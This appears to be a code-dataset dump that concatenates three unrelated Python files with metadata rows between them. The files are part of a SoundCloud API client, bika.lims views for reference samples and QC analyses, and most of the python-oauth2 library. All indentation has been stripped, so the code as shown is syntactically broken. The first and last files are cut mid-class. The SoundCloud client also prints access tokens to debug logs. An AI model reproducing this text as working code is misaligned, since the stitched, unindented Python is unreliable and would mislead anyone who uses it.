super().__init__(self.API_ROOT)
self.access_token = config.get("browsers", "soundcloud_token", None)
self.online = bool(self.access_token)
self.user_id = config.get("browsers", "soundcloud_user_id", None)
if not self.user_id:
self._get_me()
self.username = None
def _default_params(self):
params = {'client_id': self.__CLIENT_ID}
if self.access_token:
params["oauth_token"] = self.access_token
return params
def authenticate_user(self):
# create client object with app credentials
if self.access_token:
print_d("Ignoring saved Soundcloud token...")
# redirect user to authorize URL
website(self._authorize_url)
def log_out(self):
print_d("Destroying access token...")
self.access_token = None
self.save_auth()
self.online = False
def get_token(self, code):
print_d("Getting access token...")
options = {
'grant_type': 'authorization_code',
'redirect_uri': self.REDIRECT_URI,
'client_id': self.__CLIENT_ID,
'client_secret': self.__CLIENT_SECRET,
'code': code,
}
self._post('/oauth2/token', self._receive_token, **options)
@json_callback
def _receive_token(self, json):
self.access_token = json['access_token']
print_d("Got an access token: %s" % self.access_token)
self.save_auth()
self.online = True
self._get_me()
def _get_me(self):
self._get('/me', self._receive_me)
@json_callback
def _receive_me(self, json):
self.username = json['username']
self.user_id = json['id']
self.emit('authenticated', Wrapper(json))
def get_tracks(self, params):
merged = {
"q": "",
"limit": self.PAGE_SIZE,
"duration[from]": self.MIN_DURATION_SECS * 1000,
}
for k, v in params.items():
delim = " " if k == 'q' else ","
merged[k] = delim.join(list(v))
print_d("Getting tracks: params=%s" % merged)
self._get('/tracks', self._on_track_data, **merged)
@json_callback
def _on_track_data(self, json):
songs = list(filter(None, [self._audiofile_for(r) for r in json]))
self.emit('songs-received', songs)
def get_favorites(self):
self._get('/me/favorites', self._on_track_data, limit=self.PAGE_SIZE)
def get_my_tracks(self):
self._get('/me/tracks', self._on_track_data, limit=self.PAGE_SIZE)
def get_comments(self, track_id):
self._get('/tracks/%s/comments' % track_id, self._receive_comments,
limit=200)
@json_callback
def _receive_comments(self, json):
print_d("Got comments: %s" % json)
if json and len(json):
# Should all be the same track...
track_id = json[0]["track_id"]
self.emit('comments-received', track_id, json)
def save_auth(self):
config.set("browsers", "soundcloud_token", self.access_token or "")
config.set("browsers", "soundcloud_user_id", self.user_id or "")
def put_favorite(self, track_id):
print_d("Saving track %s as favorite" % track_id)
url = '/me/favorites/%s' % track_id
self._put(url, self._on_favorited)
def remove_favorite(self, track_id):
print_d("Deleting favorite for %s" % track_id)
url = '/me/favorites/%s' % track_id
self._delete(url, self._on_favorited)
@json_callback
def _on_favorited(self, json):
print_d("Successfully updated favorite: %s" % json)
def _audiofile_for(self, response):
r = Wrapper(response)
d = r.data
dl = d.get("downloadable", False) and d.get("download_url", None)
try:
url = dl or r.stream_url
except AttributeError as e:
print_w("Unusable result (%s) from SC: %s" % (e, d))
return None
uri = SoundcloudApiClient._add_secret(url)
song = SoundcloudFile(uri=uri,
track_id=r.id,
favorite=d.get("user_favorite", False),
client=self)
def get_utc_date(s):
parts = s.split()
dt = datetime.strptime(" ".join(parts[:-1]), "%Y/%m/%d %H:%M:%S")
return int((dt - EPOCH).total_seconds())
def put_time(tag, r, attr):
try:
song[tag] = get_utc_date(r[attr])
except KeyError:
pass
def put_date(tag, r, attr):
try:
parts = r[attr].split()
dt = datetime.strptime(" ".join(parts[:-1]),
"%Y/%m/%d %H:%M:%S")
song[tag] = dt.strftime("%Y-%m-%d")
except KeyError:
pass
def put_counts(tags):
for tag in tags:
try:
song["~#%s" % tag] = int(r[tag])
except KeyError:
pass
try:
song.update(title=r.title,
artist=r.user["username"],
soundcloud_user_id=str(r.user_id),
website=r.permalink_url,
genre=u"\n".join(r.genre and r.genre.split(",") or []))
if dl:
song.update(format=r.original_format)
song["~#bitrate"] = r.original_content_size * 8 / r.duration
else:
song["~#bitrate"] = DEFAULT_BITRATE
if r.description:
song["comment"] = sanitise_tag(r.description)
song["~#length"] = int(r.duration) / 1000
art_url = r.artwork_url
if art_url:
song["artwork_url"] = (
art_url.replace("-large.", "-t500x500."))
put_time("~#mtime", r, "last_modified")
put_date("date", r, "created_at")
put_counts(self.COUNT_TAGS)
plays = d.get("user_playback_count", 0)
if plays:
song["~#playcount"] = plays
# print_d("Got song: %s" % song)
except Exception as e:
print_w("Couldn't parse a song from %s (%r). "
"Had these tags:\n %s" % (r, e, song.keys()))
return song
@classmethod
def _add_secret(cls, stream_url):
return "%s?client_id=%s" % (stream_url, cls.__CLIENT_ID)
@util.cached_property
def _authorize_url(self):
url = '%s/connect' % (self.API_ROOT,)
options = {
'scope': 'non-expiring',
'client_id': self.__CLIENT_ID,
'response_type': 'code',
'redirect_uri': self.REDIRECT_URI
}
return '%s?%s' % (url, urlencode(options))
|
gpl-2.0
| -444,583,630,564,009,100
| 35.542373
| 79
| 0.552041
| false
| 3.672913
| false
| false
| false
|
rockfruit/bika.lims
|
bika/lims/browser/referencesample.py
|
1
|
17439
|
# This file is part of Bika LIMS
#
# Copyright 2011-2016 by it's authors.
# Some rights reserved. See LICENSE.txt, AUTHORS.txt.
from AccessControl import getSecurityManager
from bika.lims.browser import BrowserView
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.browser.bika_listing import BikaListingView
from bika.lims.utils import isActive
from bika.lims.browser.analyses import AnalysesView
from datetime import datetime
from operator import itemgetter
from plone.app.layout.globals.interfaces import IViewView
from Products.Archetypes.config import REFERENCE_CATALOG
from Products.ATContentTypes.utils import DT2dt
from Products.CMFCore.utils import getToolByName
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from zope.component import getMultiAdapter
from zope.interface import implements
import json, plone
class ViewView(BrowserView):
""" Reference Sample View
"""
implements(IViewView)
template = ViewPageTemplateFile("templates/referencesample_view.pt")
def __init__(self, context, request):
BrowserView.__init__(self, context, request)
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
def __call__(self):
rc = getToolByName(self.context, REFERENCE_CATALOG)
self.results = {} # {category_title: listofdicts}
for r in self.context.getReferenceResults():
service = rc.lookupObject(r['uid'])
cat = service.getCategoryTitle()
if cat not in self.results:
self.results[cat] = []
r['service'] = service
self.results[cat].append(r)
self.categories = self.results.keys()
self.categories.sort()
return self.template()
class ReferenceAnalysesViewView(BrowserView):
""" View of Reference Analyses linked to the Reference Sample.
"""
implements(IViewView)
template = ViewPageTemplateFile("templates/referencesample_analyses.pt")
def __init__(self, context, request):
super(ReferenceAnalysesViewView, self).__init__(context, request)
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
self.title = self.context.translate(_("Reference Analyses"))
self.description = ""
self._analysesview = None
def __call__(self):
return self.template()
def get_analyses_table(self):
""" Returns the table of Reference Analyses
"""
return self.get_analyses_view().contents_table()
def get_analyses_view(self):
if not self._analysesview:
# Creates the Analyses View if not exists yet
self._analysesview = ReferenceAnalysesView(self.context,
self.request)
self._analysesview.allow_edit = False
self._analysesview.show_select_column = False
self._analysesview.show_workflow_action_buttons = False
self._analysesview.form_id = "%s_qcanalyses" % self.context.UID()
self._analysesview.review_states[0]['transitions'] = [{}]
return self._analysesview
def getReferenceSampleId(self):
return self.context.id;
def get_analyses_json(self):
return self.get_analyses_view().get_analyses_json()
class ReferenceAnalysesView(AnalysesView):
""" Reference Analyses on this sample
"""
implements(IViewView)
def __init__(self, context, request):
AnalysesView.__init__(self, context, request)
self.catalog = 'bika_analysis_catalog'
self.contentFilter = {'portal_type':'ReferenceAnalysis',
'path': {'query':"/".join(self.context.getPhysicalPath()),
'level':0}}
self.show_select_row = False
self.show_sort_column = False
self.show_select_column = False
self.allow_edit = False
self.columns = {
'id': {'title': _('ID'), 'toggle':False},
'getReferenceAnalysesGroupID': {'title': _('QC Sample ID'), 'toggle': True},
'Category': {'title': _('Category'), 'toggle': True},
'Service': {'title': _('Service'), 'toggle':True},
'Worksheet': {'title': _('Worksheet'), 'toggle':True},
'Method': {
'title': _('Method'),
'sortable': False,
'toggle': True},
'Instrument': {
'title': _('Instrument'),
'sortable': False,
'toggle': True},
'Result': {'title': _('Result'), 'toggle':True},
'Captured': {'title': _('Captured'), 'toggle':True},
'Uncertainty': {'title': _('+-'), 'toggle':True},
'DueDate': {'title': _('Due Date'),
'index': 'getDueDate',
'toggle':True},
'retested': {'title': _('Retested'), 'type':'boolean', 'toggle':True},
'state_title': {'title': _('State'), 'toggle':True},
}
self.review_states = [
{'id':'default',
'title': _('All'),
'contentFilter':{},
'transitions': [],
'columns':['id',
'getReferenceAnalysesGroupID',
'Category',
'Service',
'Worksheet',
'Method',
'Instrument',
'Result',
'Captured',
'Uncertainty',
'DueDate',
'state_title'],
},
]
self.anjson = {}
def isItemAllowed(self, obj):
allowed = super(ReferenceAnalysesView, self).isItemAllowed(obj)
return allowed if not allowed else obj.getResult() != ''
def folderitem(self, obj, item, index):
item = super(ReferenceAnalysesView, self).folderitem(obj, item, index)
if not item:
return None
service = obj.getService()
item['Category'] = service.getCategoryTitle()
item['Service'] = service.Title()
item['Captured'] = self.ulocalized_time(obj.getResultCaptureDate())
brefs = obj.getBackReferences("WorksheetAnalysis")
item['Worksheet'] = brefs and brefs[0].Title() or ''
# The following item keywords are required for the
# JSON return value below, which is used to render graphs.
# they are not actually used in the table rendering.
item['Keyword'] = service.getKeyword()
item['Unit'] = service.getUnit()
self.addToJSON(obj, service, item)
return item
def addToJSON(self, analysis, service, item):
""" Adds an analysis item to the self.anjson dict that will be used
after the page is rendered to generate a QC Chart
"""
parent = analysis.aq_parent
qcid = parent.id
serviceref = "%s (%s)" % (item['Service'], item['Keyword'])
trows = self.anjson.get(serviceref, {})
anrows = trows.get(qcid, [])
anid = '%s.%s' % (item['getReferenceAnalysesGroupID'], item['id'])
rr = parent.getResultsRangeDict()
uid = service.UID()
if uid in rr:
specs = rr.get(uid, None)
smin = float(specs.get('min', 0))
smax = float(specs.get('max', 0))
error = float(specs.get('error', 0))
target = float(specs.get('result', 0))
result = float(item['Result'])
error_amount = ((target / 100) * error) if target > 0 else 0
upper = smax + error_amount
lower = smin - error_amount
anrow = {'date': item['Captured'],
'min': smin,
'max': smax,
'target': target,
'error': error,
'erroramount': error_amount,
'upper': upper,
'lower': lower,
'result': result,
'unit': item['Unit'],
'id': item['uid']}
anrows.append(anrow)
trows[qcid] = anrows
self.anjson[serviceref] = trows
def get_analyses_json(self):
return json.dumps(self.anjson)
class ReferenceResultsView(BikaListingView):
"""
"""
def __init__(self, context, request):
super(ReferenceResultsView, self).__init__(context, request)
bsc = getToolByName(context, 'bika_setup_catalog')
self.title = self.context.translate(_("Reference Values"))
self.description = self.context.translate(_(
"Click on Analysis Categories (against shaded background) "
"to see Analysis Services in each category. Enter minimum "
"and maximum values to indicate a valid results range. "
"Any result outside this range will raise an alert. "
"The % Error field allows for an % uncertainty to be "
"considered when evaluating results against minimum and "
"maximum values. A result out of range but still in range "
"if the % error is taken into consideration, will raise a "
"less severe alert."))
self.contentFilter = {}
self.context_actions = {}
self.show_sort_column = False
self.show_select_row = False
self.show_workflow_action_buttons = False
self.show_select_column = False
self.pagesize = 999999
self.columns = {
'Service': {'title': _('Service')},
'result': {'title': _('Result')},
'min': {'title': _('Min')},
'max': {'title': _('Max')},
}
self.review_states = [
{'id':'default',
'title': _('All'),
'contentFilter':{},
'columns': ['Service',
'result',
'min',
'max']},
]
def folderitems(self):
items = []
uc = getToolByName(self.context, 'uid_catalog')
# not using <self.contentsMethod=bsc>
for x in self.context.getReferenceResults():
service = uc(UID=x['uid'])[0].getObject()
item = {
'obj': self.context,
'id': x['uid'],
'uid': x['uid'],
'result': x['result'],
'min': x['min'],
'max': x['max'],
'title': service.Title(),
'Service': service.Title(),
'type_class': 'contenttype-ReferenceResult',
'url': service.absolute_url(),
'relative_url': service.absolute_url(),
'view_url': self.context.absolute_url() + "/results",
'replace': {},
'before': {},
'after': {},
'choices':{},
'class': {},
'state_class': 'state-active',
'allow_edit': [],
}
item['replace']['Service'] = "<a href='%s'>%s</a>" % \
(service.absolute_url(), service.Title())
items.append(item)
items = sorted(items, key = itemgetter('Service'))
return items
class ReferenceSamplesView(BikaListingView):
"""Main reference samples folder view
"""
def __init__(self, context, request):
super(ReferenceSamplesView, self).__init__(context, request)
portal = getToolByName(context, 'portal_url').getPortalObject()
self.icon = self.portal_url + "/++resource++bika.lims.images/referencesample_big.png"
self.title = self.context.translate(_("Reference Samples"))
self.catalog = 'bika_catalog'
self.contentFilter = {'portal_type': 'ReferenceSample',
'sort_on':'id',
'sort_order': 'reverse',
'path':{"query": ["/"], "level" : 0 }, }
self.context_actions = {}
self.show_select_column = True
request.set('disable_border', 1)
self.columns = {
'ID': {
'title': _('ID'),
'index': 'id'},
'Title': {
'title': _('Title'),
'index': 'sortable_title',
'toggle':True},
'Supplier': {
'title': _('Supplier'),
'toggle':True,
'attr': 'aq_parent.Title',
'replace_url': 'aq_parent.absolute_url'},
'Manufacturer': {
'title': _('Manufacturer'),
'toggle': True,
'attr': 'getManufacturer.Title',
'replace_url': 'getManufacturer.absolute_url'},
'Definition': {
'title': _('Reference Definition'),
'toggle':True,
'attr': 'getReferenceDefinition.Title',
'replace_url': 'getReferenceDefinition.absolute_url'},
'DateSampled': {
'title': _('Date Sampled'),
'index': 'getDateSampled',
'toggle':True},
'DateReceived': {
'title': _('Date Received'),
'index': 'getDateReceived',
'toggle':True},
'DateOpened': {
'title': _('Date Opened'),
'toggle':True},
'ExpiryDate': {
'title': _('Expiry Date'),
'index': 'getExpiryDate',
'toggle':True},
'state_title': {
'title': _('State'),
'toggle':True},
}
self.review_states = [
{'id':'default',
'title': _('Current'),
'contentFilter':{'review_state':'current'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'expired',
'title': _('Expired'),
'contentFilter':{'review_state':'expired'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'disposed',
'title': _('Disposed'),
'contentFilter':{'review_state':'disposed'},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate']},
{'id':'all',
'title': _('All'),
'contentFilter':{},
'columns': ['ID',
'Title',
'Supplier',
'Manufacturer',
'Definition',
'DateSampled',
'DateReceived',
'DateOpened',
'ExpiryDate',
'state_title']},
]
def folderitem(self, obj, item, index):
workflow = getToolByName(obj, 'portal_workflow')
if item.get('review_state', 'current') == 'current':
# Check expiry date
exdate = obj.getExpiryDate()
if exdate:
expirydate = DT2dt(exdate).replace(tzinfo=None)
if (datetime.today() > expirydate):
# Trigger expiration
workflow.doActionFor(obj, 'expire')
item['review_state'] = 'expired'
item['obj'] = obj
if self.contentFilter.get('review_state', '') \
and item.get('review_state', '') == 'expired':
# This item must be omitted from the list
return None
item['ID'] = obj.id
item['DateSampled'] = self.ulocalized_time(obj.getDateSampled(), long_format=True)
item['DateReceived'] = self.ulocalized_time(obj.getDateReceived())
item['DateOpened'] = self.ulocalized_time(obj.getDateOpened())
item['ExpiryDate'] = self.ulocalized_time(obj.getExpiryDate())
after_icons = ''
if obj.getBlank():
after_icons += "<img\
src='%s/++resource++bika.lims.images/blank.png' \
title='%s'>" % (self.portal_url, t(_('Blank')))
if obj.getHazardous():
after_icons += "<img\
src='%s/++resource++bika.lims.images/hazardous.png' \
title='%s'>" % (self.portal_url, t(_('Hazardous')))
item['replace']['ID'] = "<a href='%s/base_view'>%s</a> %s" % \
(item['url'], item['ID'], after_icons)
return item
|
agpl-3.0
| 343,148,943,437,828,700
| 39.089655
| 93
| 0.495843
| false
| 4.462385
| false
| false
| false
|
predatell/python-oauth2
|
oauth2/__init__.py
|
1
|
29176
|
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
Raise TypeError if x is a str or if x is an iterable which
contains a str.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
user. It's kind of the OAuth client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
def setter(attr):
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
if 'oauth_signature' in query:
del(query['oauth_signature'])
for k, v in self.items():
if not k in query:
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
for key, value in self.iteritems():
if key == 'oauth_signature' or key in query:
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
# Encode signature parameters per Oauth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
